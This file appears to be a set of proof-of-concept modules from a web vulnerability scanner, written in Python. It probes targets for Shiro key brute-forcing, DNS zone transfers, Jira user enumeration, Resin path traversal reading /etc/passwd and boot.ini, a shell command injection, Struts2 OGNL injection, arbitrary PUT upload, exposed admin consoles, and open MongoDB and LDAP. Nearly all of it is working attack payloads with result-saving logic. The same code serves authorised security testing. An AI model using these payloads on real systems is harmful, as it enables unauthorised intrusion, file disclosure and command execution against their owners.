def verify(arg, **kwargs): a = test_shiro(arg) if a: print("[!]Target {} Found Shiro".format(arg)) r1 = requests.get(arg, cookies={'rememberMe': "123"}, proxies=PROXY, timeout=10, verify=False, headers=headers, allow_redirects=False) res1 = len(str(r1.headers)) for key in keys: print("[-] Brute key: {0}".format(key)) payload = CBCCipher(key, base64.b64decode(checkdata)) payload = payload.decode() r2 = requests.get(arg, cookies={'rememberMe': payload}, timeout=10, proxies=PROXY, verify=False, headers=headers, allow_redirects=False) res2 = len(str(r2.headers)) if res1 != res2 and r2.status_code != 400: print("[+] Found key!!!: {}".format(key)) save(arg, pocname, key) return {"url": arg, "poc-name": pocname, "exploit": key} else: pass else: return None
def verify(arg, **kwargs): try: dnsResolver = dns.resolver.Resolver() dnsResolver.timeout = 10 host = arg.replace("http://", "") host = arg.replace("https://", "") domain = host.split(":")[0] ns = dnsResolver.query(domain, 'NS') isVul = False if ns: for domain_dns in ns: xfr = dns.query.xfr(str(domain_dns), domain, timeout=10, lifetime=10) if dns.zone.from_xfr(xfr): isVul = True #print('[+] dig @{} {} axfr'.format(domain_dns, domain)) save(domain, pocname, domain_dns) return { "url": domain, "poc-name": pocname, "exploit": domain_dns } if not isVul: pass else: pass except Exception as e: pass
def verify(arg, **kwargs): exploit = "/rest/api/latest/groupuserpicker?query=testuser12345&maxResults=50&showAvatar=false" try: r = requests.get(url=arg + exploit, timeout=5) if '{"users":{' in r.text: save(arg, pocname, exploit) return {"url": arg, "poc-name": pocname, "exploit": exploit} except Exception as e: pass
def verify(arg, **kwargs): exploit = "/ ../web-inf/" try: r = requests.get(url=arg+exploit,headers=headers) if "Directory of" in r.text and "resin" in r.text: save(arg,pocname,exploit) return {"url": arg, "poc-name":pocname, "exploit": exploit} except Exception as e: pass
def verify(arg, **kwargs): exploit = "/resin-doc/viewfile/?contextpath=C:\&servletpath=&file=boot.ini" try: r = requests.get(url=arg+exploit,headers=headers) if "disk" in r.text and "boot" in r.text: save(arg,pocname,exploit) return {"url": arg, "poc-name":pocname, "exploit": exploit} except Exception as e: pass
def verify(arg, **kwargs): exploit = "/resin-doc/viewfile/?file=index.jsp" try: r = requests.get(url=arg + exploit, headers=headers) if "<%@" in r.text and "resin" in r.text: save(arg, pocname, exploit) return {"url": arg, "poc-name": pocname, "exploit": exploit} except Exception as e: pass
def verify(arg, **kwargs): exploit = "/.svn/all-wcprops" try: r = requests.get(url=arg + exploit, headers=headers, timeout=5) if "svn:wc:ra_dav:version-url" in r.text: save(arg, pocname, exploit) return {"url": arg, "poc-name": pocname, "exploit": exploit} except Exception as e: pass
def verify(arg, **kwargs): exploit = "/resin-doc/examples/jndi-appconfig/test?inputFile=/etc/passwd" try: r = requests.get(url=arg+exploit,headers=headers) if "root:" in r.text and "/bin/bash" in r.text: save(arg,pocname,exploit) return {"url": arg, "poc-name":pocname, "exploit": exploit} except Exception as e: pass
def verify(arg, **kwargs): exploit = "/secure/QueryComponent!Default.jspa" try: r = requests.get(url=arg + exploit, timeout=5, headers=headers) if '''{"searchers":{"groups":[{"searchers":[{"name"''' in r.text: save(arg, pocname, exploit) return {"url": arg, "poc-name": pocname, "exploit": exploit} except Exception as e: pass
def verify(arg, **kwargs): exploit = "/secure/ViewUserHover.jspa?username=vvoxyxzt" try: r = requests.get(url=arg + exploit, timeout=5, headers=headers) if '''<a id="avatar-image-link" title="vvoxyxzt" href="/secure/ViewProfile.jspa?name=vvoxyxzt">''' in r.text: save(arg, pocname, exploit) return {"url": arg, "poc-name": pocname, "exploit": exploit} except Exception as e: pass
def verify(arg, **kwargs): exploit = "/druid/index.html" try: r = requests.get(url=arg+exploit,headers=headers) if "Druid Stat Index" in r.text: save(arg,pocname,exploit) return {"url": arg, "poc-name":pocname, "exploit": exploit} except Exception as e: pass
def verify(arg, **kwargs): exploit = "/jmx-console/" try: r = requests.get(url=arg + exploit, headers=headers) if 'JMImplementation' in r.text and 'JMX Agent View' in r.text and 'jboss.' in r.text: save(arg, pocname, exploit) return {"url": arg, "poc-name": pocname, "exploit": exploit} except Exception as e: pass
def verify(arg, **kwargs): exploit = "/env" try: r = requests.get(url=arg+exploit,headers=headers,timeout=7) if "spring.datasource" in r.text: save(arg,pocname,exploit) return {"url": arg, "poc-name":pocname, "exploit": exploit} except Exception as e: pass
def verify(arg, **kwargs): exploit = "/webadm/?q=moni_detail.do&action=gragh" data = "type='|cat /etc/passwd||'" try: r = requests.post(url=arg+exploit,headers=headers,data=data,timeout=7) if "root:x" in r.text: save(arg,pocname,exploit) return {"url": arg, "poc-name":pocname, "exploit": exploit} except Exception as e: pass
def verify(arg, **kwargs): exploit = "Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-RES',40765*42539)}.multipart/form-data" try: r = requests.get(url=arg,headers=headers,allow_redirects=False) #print(type(r.headers['x-res'])) if "1734102335" in r.headers['x-res']: save(arg,pocname,exploit) return {"url": arg, "poc-name":pocname, "exploit": exploit} except Exception as e: pass
def verify(arg, **kwargs): exploit1 = "/.idea/workspace.xml" exploit2 = "/.idea/modules.xml" exploit3 = "/.idea/" try: r1 = requests.get(url=arg + exploit3, headers=headers, timeout=5) if "Directory: /.idea/" in r1.text: save(arg, pocname, exploit3) return {"url": arg, "poc-name": pocname, "exploit": exploit3} except Exception as e: pass
def verify(arg, **kwargs): #port = 27017 host = arg.replace("http://", "") host = arg.replace("https://", "") ip = host.split(":")[0] a = check_ldap(ip) try: if a: save(arg, pocname, "389") return {"url": host, "poc-name": pocname, "exploit": "389"} except Exception as e: pass
def bak(domain, file): try: r = requests.get(url=domain + file, headers=headers) if r.status_code == 200 and "Content-Type" in r.headers and "application" in r.headers[ "Content-Type"]: #global target target = domain + file save(domain, pocname, target) print({"url": domain, "poc-name": pocname, "exploit": target}) #print(target) except Exception as e: pass
def verify(arg, **kwargs): exploit = "/2222.txt" data = "This is a test!" try: r = requests.put(url=arg+exploit,headers=headers,data=data,timeout=7) r1 = requests.get(url=arg+exploit,headers=headers,timeout=5) if "This is a test!" in r1.text: save(arg,pocname,exploit) requests.delete(url=arg+exploit) return {"url": arg, "poc-name":pocname, "exploit": exploit} except Exception as e: pass
def verify(arg, **kwargs): port = 27017 host = arg.replace("http://", "") host = arg.replace("https://", "") host = host.split(":")[0] a = check_mongodb(host, port) try: if a: save(arg, pocname, str(port)) return {"url": host, "poc-name": pocname, "exploit": str(port)} except Exception as e: pass
def verify(arg, **kwargs): try: a = requests.get(url=arg) start = int(a.headers['Content-Length']) + 300 end = 0x8000000000000000 - start headers = {"Range": "bytes=-{},-{}".format(start, end)} res = requests.get(url=arg, headers=headers, stream=True, timeout=10) ret = res.raw.read(500) code = res.status_code if code == 206: save(arg, pocname, pocname) return {"url": arg, "poc-name": pocname, "exploit": pocname} except Exception as e: pass
def verify(arg, **kwargs): exploit = "upload type,the same as st2-045" boundary = "---------------------------735323031399963166993862150" paylaod = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-RES',40765*42539)}\x00b" headers = { 'Content-Type': 'multipart/form-data; boundary=' + boundary + '' } data = "--" + boundary + "\r\nContent-Disposition: form-data; name=\"foo\"; filename=\"" + paylaod + "\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n--" + boundary + "--" try: r = requests.post(url=arg, headers=headers, data=data) if "1734102335" in r.headers['x-res']: save(arg, pocname, exploit) return {"url": arg, "poc-name": pocname, "exploit": exploit} except Exception as e: pass